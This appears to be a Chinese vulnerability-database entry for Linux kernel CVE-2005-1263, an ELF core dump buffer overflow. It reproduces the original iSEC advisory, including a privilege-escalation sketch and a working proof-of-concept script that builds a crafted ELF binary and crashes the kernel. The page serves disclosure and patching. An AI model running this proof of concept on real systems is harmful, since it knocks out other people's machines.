CVE-2005-1263
CVSS7.2
发布时间 :2005-05-11 00:00:00
修订时间 :2011-03-07 21:21:32
NMCOPS    

[原文]The elf_core_dump function in binfmt_elf.c for Linux kernel 2.x.x to 2.2.27-rc2, 2.4.x to 2.4.31-pre1, and 2.6.x to 2.6.12-rc4 allows local users to execute arbitrary code via an ELF binary that, in certain conditions involving the create_elf_tables function, causes a negative length argument to pass a signed integer comparison, leading to a buffer overflow.


[CNNVD]Linux Kernel ELF Core Dump本地溢出漏洞(CNNVD-200505-968)

        Linux Kernel是Linux操作系统所使用的内核。
        Linux Kernel在创建ELF core dump时存在本地溢出漏洞,本地攻击者可能利用此漏洞进行拒绝服务攻击或提升权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:linux:linux_kernel:2.4.27Linux Kernel 2.4.27
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.2.3Linux Kernel 2.2.3
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.2.10Linux Kernel 2.2.10
cpe:/o:linux:linux_kernel:2.6.11Linux Kernel 2.6.11
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11
cpe:/o:linux:linux_kernel:2.6.9:2.6.20
cpe:/o:linux:linux_kernel:2.2.14Linux Kernel 2.2.14
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.2.13Linux Kernel 2.2.13
cpe:/o:linux:linux_kernel:2.4.29:rc2Linux Kernel 2.4.29 rc2
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.2.16Linux Kernel 2.2.16
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.2.7Linux Kernel 2.2.7
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.2.18Linux Kernel 2.2.18
cpe:/o:linux:linux_kernel:2.6.12:rc4Linux Kernel 2.6.12 Release Candidate 4
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.2.2Linux Kernel 2.2.2
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.2.23Linux Kernel 2.2.23
cpe:/o:linux:linux_kernel:2.4.30Linux Kernel 2.4.30
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.4.27:pre2Linux Kernel 2.4.27 pre2
cpe:/o:linux:linux_kernel:2.6.8:rc3Linux Kernel 2.6.8 Release Candidate 3
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.2.17Linux Kernel 2.2.17
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.27:pre4Linux Kernel 2.4.27 pre4
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.27:pre5Linux Kernel 2.4.27 pre5
cpe:/o:linux:linux_kernel:2.2.1Linux Kernel 2.2.1
cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.2.20Linux Kernel 2.2.20
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.4.31:pre1Linux Kernel 2.4.31 pre1
cpe:/o:linux:linux_kernel:2.2.0Linux Kernel 2.2
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.2.11Linux Kernel 2.2.11
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.2.12Linux Kernel 2.2.12
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.28Linux Kernel 2.4.28
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.27:pre3Linux Kernel 2.4.27 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.2.6Linux Kernel 2.2.6
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.27:pre1Linux Kernel 2.4.27 pre1
cpe:/o:linux:linux_kernel:2.2.24Linux Kernel 2.2.24
cpe:/o:linux:linux_kernel:2.2.9Linux Kernel 2.2.9
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.2.22Linux Kernel 2.2.22
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.2.15Linux Kernel 2.2.15
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.6.8:rc2Linux Kernel 2.6.8 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.2.21Linux Kernel 2.2.21
cpe:/o:linux:linux_kernel:2.2.27:rc2Linux Kernel 2.2.27 rc2
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.2.5Linux Kernel 2.2.5
cpe:/o:linux:linux_kernel:2.6.10:rc2Linux Kernel 2.6.10 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.2.8Linux Kernel 2.2.8
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.2.19Linux Kernel 2.2.19
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/o:linux:linux_kernel:2.6.8:rc1Linux Kernel 2.6.8 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.6.10Linux Kernel 2.6.10
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:linux:linux_kernel:2.6.8Linux Kernel 2.6.8
cpe:/o:linux:linux_kernel:2.2.4Linux Kernel 2.2.4
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1122Linux Kernel elf_core_dump() Buffer Overflow
oval:org.mitre.oval:def:10909The elf_core_dump function in binfmt_elf.c for Linux kernel 2.x.x to 2.2.27-rc2, 2.4.x to 2.4.31-pre1, and 2.6.x to 2.6.12-rc4 allows local ...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1263
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1263
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-968
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/0524
(UNKNOWN)  VUPEN  ADV-2005-0524
http://www.securityfocus.com/bid/13589
(UNKNOWN)  BID  13589
http://www.securityfocus.com/archive/1/397966
(UNKNOWN)  BUGTRAQ  20050511 Linux kernel ELF core dump privilege elevation
http://www.isec.pl/vulnerabilities/isec-0023-coredump.txt
(UNKNOWN)  MISC  http://www.isec.pl/vulnerabilities/isec-0023-coredump.txt
http://www.securityfocus.com/archive/1/archive/1/428058/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:157459-2
http://www.securityfocus.com/archive/1/archive/1/428028/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:157459-1
http://www.securityfocus.com/archive/1/archive/1/427980/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:157459-3
http://www.redhat.com/support/errata/RHSA-2005-551.html
(UNKNOWN)  REDHAT  RHSA-2005:551
http://www.redhat.com/support/errata/RHSA-2005-529.html
(UNKNOWN)  REDHAT  RHSA-2005:529
http://www.redhat.com/support/errata/RHSA-2005-472.html
(UNKNOWN)  REDHAT  RHSA-2005:472
http://secunia.com/advisories/19607
(UNKNOWN)  SECUNIA  19607
http://secunia.com/advisories/19185
(UNKNOWN)  SECUNIA  19185
ftp://patches.sgi.com/support/free/security/advisories/20060402-01-U
(UNKNOWN)  SGI  20060402-01-U

- 漏洞信息

Linux Kernel ELF Core Dump本地溢出漏洞
高危 缓冲区溢出
2005-05-11 00:00:00 2005-10-20 00:00:00
本地  
        Linux Kernel是Linux操作系统所使用的内核。
        Linux Kernel在创建ELF core dump时存在本地溢出漏洞,本地攻击者可能利用此漏洞进行拒绝服务攻击或提升权限。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.kernel.org/

- 漏洞信息 (F39133)

isec-0023-coredump.txt (PacketStormID:F39133)
2005-08-07 00:00:00
Paul Starzetz  isec.pl
exploit,kernel,proof of concept
linux
CVE-2005-1263
[点击下载]

Linux kernel ELF core dump privilege elevation advisory and proof of concept exploit. Affects the 2.2 series up to and including 2.2.27-rc2 and 2.4 up to and including 2.4.31-pre1. Also affected is 2.6 up to and including 2.6.12-rc4.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

since it became clear from the discussion in January about the uselib() 
vulnerability, that the Linux community prefers full, non-embargoed 
disclosure of kernel bugs, I release full details right now. However to 
follows at least some of the responsable disclosure rules, no exploit code will be 
released. Instead, only a proof-of-concept code is released to demonstrate 
the vulnerability.

regards

- -- 
Paul Starzetz
iSEC Security Research
http://isec.pl/


Synopsis:  Linux kernel ELF core dump privilege elevation
Product:   Linux kernel
Version:   2.2 up to and including 2.2.27-rc2, 2.4 up to and including
           2.4.31-pre1, 2.6 up to and including 2.6.12-rc4
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0023-coredump.txt
CVE:       CAN-2005-1263
Severity:  local(9)
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      May 11, 2005


Issue:
======

A locally exploitable flaw has been found in the Linux ELF binary format
loader's core dump  function  that  allows  local  users  to  gain  root
privileges and also execute arbitrary code at kernel privilege level.


Details:
========

The Linux kernel contains a binary format loader layer to load (execute)
programs in different binary formats like ELF  or  a.out.  Some  of  the
binary  format  modules  like  ELF provide an additional function to the
kernel layer named core_dump(). The kernel may call this function  if  a
fault  (e.g.  memory  access  error)  occurs during the execution of the
binary. The core_dump() function will be called by the  kernel,  if  the
process's limit for the core file (RLIMIT_CORE) is sufficiently high and
the process's binary format supports core dumping.

The regular task of the core_dump() function is to  create  an  on  disk
image  of  the  faulty  binary  at the moment of the execution fault for
debugging purposes. In the case of an ELF binary, the image will contain
a  memory  fingerprint  of  the  binary, its registers and moreover some
kernel level structures  containing  the  kernel  state  of  the  faulty
process.

An  analyze  of  the  ELF's  function  elf_core_dump() from binfmt_elf.c
revealed a flaw in the handling of the argument area of an ELF  process.
The  argument  area  is the memory region of the process (in user space)
that contains program arguments at the time  of  its  initial  execution
(argc and argv arguments to the C main() function, arg_start and arg_end
fields in the process's memory descriptor).


Discussion:
=============

The vulnerable  code  resides  in  fs/binfmt_elf.c  in  your  preferable
version of the Linux kernel source code tree:

static int elf_core_dump(long signr, struct pt_regs * regs, struct file * file)
{
       struct elf_prpsinfo psinfo; /* NT_PRPSINFO */

       /* first copy the parameters from user space */
       memset(&psinfo, 0, sizeof(psinfo));
       {
[*]           int i, len;

              len = current->mm->arg_end - current->mm->arg_start;
[**]          if (len >= ELF_PRARGSZ)
                     len = ELF_PRARGSZ-1;
[1167]        copy_from_user(&psinfo.pr_psargs,
                           (const char *)current->mm->arg_start, len);

where  the  line numbers are all valid for the 2.4.30 kernel version. As
can be seen from [*] the len variable supplied to  the  copy_from_user()
function  is signed and can potentially take a negative value. That will
let the check [**] pass  (since  the  ELF_PRARGSZ  constant  is  defined
signed  the  check will be performed with signed arithmetic) and cause a
kernel stack buffer overflow. Note that a negative  length  provided  to
copy_from_user()  will  be interpreted as a very high positive byte copy
count, since the length argument of  the  copy_from_user()  function  is
defined unsigned itself.

However,  there  is at least one difficulty - how could the len argument
become negative? A fast grep through the source code  reveals  that  the
arg_start/end  fields are set only during execution of a new program. In
case of ELF this is performed in the create_elf_tables() subroutine from
binfmt_elf.c,  so  that  in theory those fields are always reset to safe
values. Paradoxically,  there  is  a  flaw  in  the  create_elf_tables()
function,  that  can  permit  a  binary to "inherit" old values from the
preceding binary (during binary execution the task descriptor as well as
the memory descriptor are kept). A look at the code in question reveals:

static elf_addr_t *
create_elf_tables(char *p, int argc, int envc,
                struct elfhdr * exec,
                unsigned long load_addr,
                unsigned long load_bias,
                unsigned long interp_load_addr, int ibcs)
{
       current->mm->arg_start = (unsigned long) p;
       while (argc-->0) {
              __put_user((elf_caddr_t)(unsigned long)p,argv++);
              len = strnlen_user(p, PAGE_SIZE*MAX_ARG_PAGES);
              if (!len || len > PAGE_SIZE*MAX_ARG_PAGES)
[239]                return NULL;
              p += len;
       }
       __put_user(NULL, argv);
       current->mm->arg_end = current->mm->env_start = (unsigned long) p;

Obviously it is possible  to  return  from  create_elf_tables()  without
setting  arg_end  (but  with  arg_start  set  to  a  new  value), if the
strnlen_user()  function  fails  to  count  the  length  of  the  binary
argument(s)  supplied.  If  the  arg_start value becomes higher than the
previous end  of  arguments  in  the  "binary  before",  the  difference
<arg_end-arg_start>  will  evaluate  to a negative value, permitting the
buffer overflow described before.

To  exactly  understand  how  the  strnlen_user()  function  could  fail
counting  argument  length,  we  would  have to dig very deeply into the
internals of binary execution as well as into those of ELF.  However  in
order  not  to  sacrifice  the  briefness of an advisory, here comes the
trick:

It is possible to create a manipulated ELF binary, that specifies an ELF
program section to be loaded at the place of program arguments, but with
no access rights itself (that is, a page table level protection equal to
PROT_NONE). That will cause the strnlen_user() function to page fault at
the first attempt to count argument lengths. Moreover,  the  loading  of
ELF  sections  happens just after the initial arguments have been set up
in the fresh memory space, so that it is easily possible  to  "override"
the  predefined  ELF  memory layout. To illustrate this, here two memory
layouts:

(1) initial ELF memory layout before starting to load program sections:

- ----------------EMPTY------------------[ ARGS stack region ] TASK_SIZE


(2) possible memory layout after loading ELF sections:

- ---------[CODE][DATA]------------------[FAKE][stack region ] TASK_SIZE

where FAKE is an ELF section mmaped into memory  with  PROT_NONE  rights
specified.

Last  aspect  to  discuss  here  is  the exploitability under real world
conditions. There is  a  "bug  in  the  bug":  if  the  copy_from_user()
function  will  is called with a very high byte count, it will revert to
zeroing the kernel buffer supplied (due to  the  access_ok()  checking),
effectively killing the kernel memory space. However, we believe that it
is possible to carefully prepare the overflow environment  in  order  to
make the bug exploitable. Here just the sketch:

- -  the buffer overflown resides on the task's stack in the kernel space,
that is, if the overflow occurs, everything following the task_struct in
kernel space will be zero-killed

- -  if  the  task  struct  resides  just  before  the  end  of the kernel
accessible memory, this will cause a kernel Ooops and kill  the  current
task  but  probably  leave  the  system stable. If some kernel structure
follows the task struct and contains pointers that are  not  checked  by
the  kernel  before  dereference,  this  immediately  leads  to elevated
privileges

- - in the case of SMP the bug is  easily  exploitable  under  real  world
conditions  as  follows:  two  tasks  are  created  at  adjacent  kernel
addresses (that can be accomplished by creating 3  tasks,  core  dumping
one  of  them  and  inspecting  the  parent/sibling  pointers  form  the
task_struct!). The first task triggers the overflow, so that the  second
task_struct  is  filled  with zeros. The second task running on a second
CPU  repeatedly  issues  a  "lcall  27"  ABI   call,   that   will   use
current->exec_domain   pointer   without  check  (stored  at  the  early
beginning of the  task_struct).  If  the  second  task  sets  up  proper
structures  in  its  virtual memory space, this will let the second task
enter kernel privilege level 0 and permit a  recovery  from  the  buffer
overflow.

We were able to successfully exploit the bug under laboratory conditions
even on a single CPU machine.


Impact:
=======

Unprivileged local users may gain elevated (root) privileges.  Code  may
be  executed  at  the kernel privilege level potentially breaking out of
Linux virtual machines. A hotfix for this vulnerability is  to  disallow
processes  to  drop  core.  This can be accomplished by setting the hard
core size limit to 0.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has  identified  the  vulnerability  and
performed  further  research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH  EXPRESS  PERMISSION  OF
ONE OF THE AUTHORS.


References:
========

[1] http://www.skyfree.org/linux/references/ELF_Format.pdf

[2] http://www.gnu.org/software/binutils/manual/ld-2.9.1/


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

#!/bin/bash
#
# elfcd.sh
# warning: This code will crash your machine
#
cat <<__EOF__>elfcd1.c
/*
 *	Linux binfmt_elf core dump buffer overflow
 *
 *	Copyright (c) 2005  iSEC Security Research. All Rights Reserved.
 *
 *	THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *	AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *	WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */
//	phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>


static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];


void fatal(const char *msg)
{
	if(!errno) {
		fprintf(stderr, "\nFATAL: %s\n", msg);
	}
	else {
		printf("\n");
		perror(msg);
	}
	fflush(stdout); fflush(stderr);
	_exit(129);
}


int main(int ac, char **av)
{
int esp, i, r;
struct rlimit rl;

	__asm__("movl %%esp, %0" : : "m"(esp));
	printf("\n[+] %s argv_start=%p argv_end=%p  ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp);
	rl.rlim_cur = RLIM_INFINITY;
	rl.rlim_max = RLIM_INFINITY;
	r = setrlimit(RLIMIT_CORE, &rl);
	if(r) fatal("setrlimit");

	memset(env, 0, sizeof(env) );
	memset(argv, 0, sizeof(argv) );
	memset(page, 'A', sizeof(page) );
	page[PAGE_SIZE-1]=0;

//	move up env & exec phase 2
	if(!strcmp(av[0], "AAAA")) {
		printf("\n[+] phase 2, <RET> to crash "); fflush(stdout);
		argv[0] = "elfcd2";
		argv[1] = page;

//	term 0 counts!
		memset(buf, 0, sizeof(buf) );
		for(i=0; i<789 + 4; i++)
			buf[i] = 'C';
		argv[2] = buf;
		execve(argv[0], argv, env);
		_exit(127);
	}

//	move down env & reexec
	for(i=0; i<9; i++)
		env[i] = page;

	argv[0] = "AAAA";
	printf("\n[+] phase 1"); fflush(stdout);
	execve(av[0], argv, env);

return 0;
}
__EOF__
cat <<__EOF__>elfcd2.c
//	phase 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read		__NR_read
#define __NR_sys_kill		__NR_kill
#define __NR_sys_getpid		__NR_getpid


char stack[4096 * 6];
static int errno;


inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);


//	yeah, lets do it
void killme()
{
char c='a';
int pid;

	pid = sys_getpid();
	for(;;) {
		sys_read(0, &c, 1);
		sys_kill(pid, 11);
	}
}


//	safe stack stub
__asm__(
	"		nop				\n"
	"_start:	movl 	\$0xbfff6ffc, %esp	\n"
	"		jmp 	killme			\n"
	".global 	_start				\n"
);
__EOF__
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
              "elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
  ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
  rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
}

PHDRS
{
  headers PT_PHDR PHDRS ;
  text PT_LOAD FILEHDR PHDRS ;
  fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
}

SECTIONS
{

  .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme

  . = 0xbfff0000 + SIZEOF_HEADERS;
  .text : { *(.text) } >ram :text
  .data : { *(.data) } >ram :text
  .bss       :
  {
   *(.dynbss)
   *(.bss)
   *(.bss.*)
   *(.gnu.linkonce.b.*)
   *(COMMON)
   . = ALIGN(32 / 8);
  } >ram :text

}
__EOF__

# compile & run
echo -n "[+] Compiling..."
gcc -O2 -Wall elfcd1.c -o elfcd1
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
./elfcd1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFCgefMC+8U3Z5wpu4RAnFjAKDFK65U0CBHXxpUhx00GpVowRPU3ACcDRpz
r2WJc+3mWorh8ldrtEFLnss=
=qCFi
-----END PGP SIGNATURE-----


    

- 漏洞信息 (F37840)

Openwall Linux Kernel Patch (PacketStormID:F37840)
2005-06-01 00:00:00
Solar Designer  openwall.com
overflow,kernel
linux
CVE-2005-1263
[点击下载]

The Openwall Linux kernel patch is a collection of security hardening features for the Linux kernel which can stop most 'cookbook' buffer overflow exploits. The patch can also add more privacy to the system by restricting access to parts of /proc so that users may not see what others are doing. Also tightens down file descriptors 0, 1, and 2, implements process limits and shared memory destruction.

- 漏洞信息

16424
Linux Kernel ELF Core Dump Privilege Escalation
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-11 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.6.11.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Kernel ELF Core Dump Local Buffer Overflow Vulnerability
Boundary Condition Error 13589
No Yes
2005-05-11 12:00:00 2007-03-07 04:05:00
Paul Starzetz <ihaquer@isec.pl> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Trustix Secure Enterprise Linux 2.0
SmoothWall Express 2.0
SGI ProPack 3.0 SP6
SGI ProPack 3.0 SP5
SGI ProPack 3.0 SP4
SGI ProPack 3.0 SP3
SGI ProPack 3.0 SP2
SGI ProPack 3.0 SP1
SGI ProPack 3.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 3
RedHat Desktop 3.0
Red Hat Fedora Core3
Red Hat Enterprise Linux AS 3
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
